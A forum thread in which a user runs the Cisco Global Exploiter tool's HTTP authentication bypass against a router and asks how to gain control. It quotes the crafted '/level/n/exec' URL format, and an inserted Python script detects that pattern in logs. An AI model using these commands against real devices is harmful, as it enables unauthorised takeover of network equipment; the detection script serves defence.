Hi,
I have a Cisco router. I tried playing with it and I found this:
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl
Usage :
perl cge.pl <target> <vulnerability number>
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3
Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...
root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....
It gives me a blank page, so how can I go forward with this exploit?
What can I do to control the router?
Best regards,
My answer is a little off-thread, but I suggest you visit the nmap pen test list; there's an interesting DoS thread. Regards.
Maybe you should check the documentation and read up on what the specific exploit does and doesn't do, which targets are vulnerable and so on.
Tiocfaidh ár lá
This is what the documentation says:
By sending a crafted URL it is possible to bypass authentication and execute any
command on the router at level 15 (enable level, the most privileged level).
This will happen only if the user is using a local database for authentication
(usernames and passwords are defined on the device itself).
The same URL will not be effective against every Cisco IOS software release and
hardware combination. However, there are only 84 different combinations to try,
so it would be easy for an attacker to test them all in a short period of time.
The URL in question follows this format :
http://<device_addres>/level/n/exec/....
where n is a number between 16 and 99.
An attacker can exercise complete control over the device.
By exploiting this vulnerability, the attacker can see and change the
configuration of the device.
That is what made me ask that question.
Last edited by skull2006; 07-19-2010 at 08:08 AM.
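For anyone defending a device with the HTTP server enabled, the URL format quoted above is easy to look for in request logs. The following is an added example, not part of the thread or of the quoted documentation; it assumes requests to the device are recorded in Common Log Format by a proxy or sensor, and the log lines and addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines (Common Log Format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jul/2010:08:01:02 +0000] "GET /level/16/exec/ HTTP/1.0" 401 0
192.0.2.10 - - [19/Jul/2010:08:01:03 +0000] "GET /level/17/exec/ HTTP/1.0" 200 512
192.0.2.10 - - [19/Jul/2010:08:01:04 +0000] "GET /level/18/exec/ HTTP/1.0" 401 0
198.51.100.7 - - [19/Jul/2010:08:05:00 +0000] "GET /level/15/exec/ HTTP/1.0" 401 0
198.51.100.7 - - [19/Jul/2010:08:05:09 +0000] "GET /index.html HTTP/1.0" 200 1024
198.51.100.20 - - [19/Jul/2010:08:07:00 +0000] "GET /level/20/exec/ HTTP/1.0" 401 0
198.51.100.20 - - [19/Jul/2010:08:07:01 +0000] "GET /level/21/exec/ HTTP/1.0" 401 0
203.0.113.5 - - [19/Jul/2010:08:09:00 +0000] "GET /%6cevel/42/exec/ HTTP/1.0" 200 300
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LEVEL_RE = re.compile(r'^/level/(\d+)/exec(?:/|$)', re.IGNORECASE)

def scan(log_text):
    """Return {source_ip: {"levels": [...], "accepted": [...]}} for requests
    to /level/n/exec with n in 16..99, the range the documentation names."""
    hits = defaultdict(lambda: {"levels": set(), "accepted": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable request line
        src, _method, raw_path, status = m.groups()
        # Decode percent-encoding and drop any query string before matching.
        path = unquote(raw_path.split("?", 1)[0])
        lvl = LEVEL_RE.match(path)
        if not lvl or not 16 <= int(lvl.group(1)) <= 99:
            continue  # levels up to 15 are ordinary privilege levels
        n = int(lvl.group(1))
        hits[src]["levels"].add(n)
        if status.startswith("2"):
            hits[src]["accepted"].add(n)  # device answered instead of refusing
    return {ip: {k: sorted(v) for k, v in d.items()} for ip, d in hits.items()}

def classify(entry):
    """critical: a 2xx reply was seen; sweep: several levels tried; else probe."""
    if entry["accepted"]:
        return "critical"
    return "sweep" if len(entry["levels"]) > 1 else "probe"

if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, classify(entry), entry)
```

A "critical" result means the device should be treated as compromised and its configuration reviewed, since the documentation states the attacker can see and change it.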
Well, did you check all 84 combinations?
Tiocfaidh ár lá
"what i can do to control the router?"
Perhaps you should look at how it normally works... Then derive an answer for yourself after those observations?
"It give me Blank Page"
Are you running no-script or ad-block?
Or perhaps you shouldn't be futzing with things you don't understand.
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.